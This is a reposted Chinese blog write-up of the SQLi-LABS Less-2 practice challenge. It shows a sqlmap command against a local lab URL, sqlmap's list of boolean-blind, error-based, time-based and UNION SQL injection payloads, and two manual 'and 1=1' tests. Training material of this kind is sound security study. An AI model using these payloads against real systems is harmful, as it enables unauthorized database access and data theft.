码迷,mamicode.com
首页 > 数据库 > 详细

SQLi-LABS Page-2(Basic Challenges)

时间:2017-11-21 22:14:31      阅读:249      评论:0      收藏:0      [点我收藏+]

标签:com   asi   order by   hal   abs   null   分享   手动测试   mat   

技术分享图片

 

sqlmap:

python sqlmap.py -u "http://mysqli/Less-2/?id=1"

技术分享图片

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9029=9029

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 7263 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(7263=7263,1))),0x7170786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6666 UNION ALL SELECT NULL,NULL,CONCAT(0x71707a6b71,0x6e65656d6264666469465061554a43627450625658767a67535a5767495a79756a54685759476441,0x7170786b71)-- Vdjy
---

手动测试:

id = 1 and 1=1

技术分享图片

 

 id=1 and 1=2技术分享图片

 

SQLi-LABS Page-2(Basic Challenges)

标签:com   asi   order by   hal   abs   null   分享   手动测试   mat   

原文地址:http://www.cnblogs.com/natian-ws/p/7875346.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!